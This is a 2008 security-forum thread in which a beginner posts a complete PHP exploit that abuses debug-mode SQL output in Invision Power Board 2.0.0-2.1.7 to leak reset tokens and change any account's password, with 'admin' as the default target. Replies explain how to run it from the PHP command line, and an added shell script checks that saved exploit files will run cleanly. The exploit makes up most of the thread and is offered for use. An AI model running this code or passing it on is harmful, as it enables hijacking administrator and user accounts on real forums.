IT Security and Insecurity Portal

Using PHP Exploits ?

Posted: Thu Jul 17, 2008 7:49 pm
W4133D
Beginner
Joined: Jul 17, 2008
Posts: 3

How do I use a PHP exploit?
Code:
<?php
/*
Debug Mode password change vulnerability
Affects Invision Power Board 2.0.0 to 2.1.7
by Rapigator
This works if:
"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on
In General Configuration of the forum software.
*/
// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
// An existing user's login name
$name = "admin";
// The new password (3-32 characters)
$pass = "1234";
// You can use a proxy (host:port); leave empty for a direct connection
$proxy = "";
// $proxy = "1.2.3.4:8080";
// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);

// Step 1: load the lost-password form (act=Reg&CODE=10). With SQL debug
// output enabled the page prints the INSERT into <prefix>_reg_antispam,
// which leaks the regid/regcode anti-spam token generated for this request.
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
// "Debug Level" 3 wraps the SQL in coloured <span> tags
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
    $prefix = $regs[1];
    $regid = $regs[2];
    $regcode = $regs[3];
} else {
    // Otherwise try the plain-text dump that SQL Debug Mode prints for &debug=1
    $suffix = "&debug=1";
    $curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
    curl_setopt($curl, CURLOPT_PROXY, $proxy);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    $page = curl_exec($curl);
    curl_close($curl);
    if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
        $prefix = $regs[1];
        $regid = $regs[2];
        $regcode = $regs[3];
    }
}
if (!isset($regid) || !isset($regcode)) {
    echo "Error: Probably not vulnerable, or no forum found";
    exit;
}

// Step 2: submit the lost-password request for the target user (CODE=11).
// The debug output now leaks the INSERT into <prefix>_validating, i.e. the
// validation key (vid) and member_id that are normally only sent by e-mail.
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
    change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
    change_pass($regcode,$regid,$regs[1],$regs[2]);
}
echo "Error: validation key not found in the debug output";

// Step 3: finish the lost-password flow (CODE=03, type=lostpass) with the
// leaked vid and member id, which sets the new password for the account.
function change_pass($regcode,$regid,$vid,$userid) {
    global $site, $proxy, $name, $pass, $suffix;
    $curl = curl_init($site.$suffix);
    curl_setopt($curl, CURLOPT_PROXY, $proxy);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    $page = curl_exec($curl);
    curl_close($curl);
    echo "Password Changed!";
    exit;
}
?>
# milw0rm.com [2006-11-01]

Posted: Thu Jul 17, 2008 8:10 pm
mge
Valuable expert
Joined: Jul 16, 2008
Posts: 142

PHP is not only executable as a web server module; it also comes with a CLI (command line interface).
Just go into the command prompt, change into the directory with the script and enter the path to php.exe in your PHP directory with the script name as a parameter, for example:
c:\php\php.exe script.php
You need to have PHP installed first, of course.
If you have the PHP directory in your PATH variable, you won't need to type the full path; php or php.exe would be sufficient.

Posted: Thu Jul 17, 2008 8:14 pm
W4133D
Beginner
Joined: Jul 17, 2008
Posts: 3

Ok, thanks, that helped out a lot. And these exploits work just like Perl exploits, right?

Posted: Thu Jul 17, 2008 8:22 pm
mge
Valuable expert
Joined: Jul 16, 2008
Posts: 142

I can't say for sure; I guess it says it all in the source code. I think so, though.

Posted: Tue Jul 22, 2008 10:38 am
set4s
Beginner
Joined: Jul 22, 2008
Posts: 1

Why do PHP exploits sometimes act strange in Windows cmd? When I use php exploit.php it outputs all the f.. source to the screen... Is it because the exploit is broken, or do I have PHP misconfigured?
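An added pre-flight check for the symptom in the post above; it is not part of the thread and not anybody's exploit code. The PHP CLI prints anything outside `<?php ... ?>` verbatim, so a file that still contains the forum's page markup or HTML-escaped tags (`&lt;?php`), or one that relies on the short `<?` tag while short_open_tag is off, spills its own source to the console instead of running. The script assumes a POSIX shell with grep, sed, od and tail (on Windows that means WSL, Cygwin or Git Bash rather than cmd.exe); the sample files it creates are constructed for the demonstration and are not real exploits.

```shell
#!/bin/sh
# Added example, not from the forum thread: sanity-check a PHP script
# saved from a web page before handing it to the PHP CLI.
# Assumes a POSIX shell with grep, sed, od and tail; the samples built by
# make_samples are constructed for the demonstration.

# check_php_script FILE
# Prints one line per finding; returns 0 only if the file looks runnable.
check_php_script() {
    f=$1
    rc=0
    skip=0
    if [ ! -r "$f" ]; then
        echo "fail: cannot read $f"
        return 2
    fi

    # A UTF-8 byte order mark is not an error, but PHP echoes those three
    # bytes to stdout before anything else; skip it when reading the tag.
    if [ "$(od -An -tx1 -N 3 "$f" | tr -d ' \n')" = "efbbbf" ]; then
        echo "warn: UTF-8 BOM; PHP prints those three bytes before running"
        skip=3
    fi

    # The first non-blank line must begin with the full open tag; anything
    # before it (page text, an escaped tag) is printed, not parsed.
    first=$(tail -c +$((skip + 1)) "$f" | grep -m 1 '[^[:space:]]' | sed 's/^[[:space:]]*//')
    case "$first" in
        '<?php'*) ;;
        '<?'*)
            echo "warn: short open tag <?; with short_open_tag=Off the file is printed as text"
            rc=1 ;;
        '')
            echo "fail: file is empty"
            rc=1 ;;
        *)
            echo "fail: first non-blank line is not <?php: $first"
            rc=1 ;;
    esac

    # HTML entities or forum markup mean the rendered page was saved, not the
    # raw code: PHP never sees an open tag in "&lt;?php" and echoes everything.
    if grep -q -e '&lt;?' -e '^Code:' "$f"; then
        echo "fail: HTML entities or forum markup in the source"
        rc=1
    fi

    # DOS line endings are harmless for php.exe but break a #! line on Unix.
    if grep -q "$(printf '\r')" "$f"; then
        echo "warn: CRLF line endings"
    fi

    if [ "$rc" -eq 0 ]; then
        echo "ok: $f starts with <?php and contains no page markup"
    fi
    return "$rc"
}

# Constructed sample files for the demonstration (not real exploits);
# prints the directory they were written to.
make_samples() {
    dir=$(mktemp -d)
    printf '<?php\necho "runs fine\\n";\n' > "$dir/good.php"
    printf 'Code:\n&lt;?php\necho "copied from the page";\n' > "$dir/copied.php"
    printf '<?\necho "needs short_open_tag";\n' > "$dir/short.php"
    printf '\357\273\277<?php\necho "bom";\n' > "$dir/bom.php"
    printf '<?php\r\necho "dos";\r\n' > "$dir/crlf.php"
    echo "$dir"
}

# Usage: sh check.sh exploit.php && php exploit.php
for f in "$@"; do
    check_php_script "$f"
done
```

The heuristics are deliberately narrow (`&lt;?` and a leading `Code:` line) so that a legitimate script that echoes HTML entities is not flagged; once the file passes, `php -l exploit.php` is the authoritative syntax check if PHP is installed.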
www.waraxe.us Forum Index -> Php
Powered by phpBB © 2001-2008 phpBB Group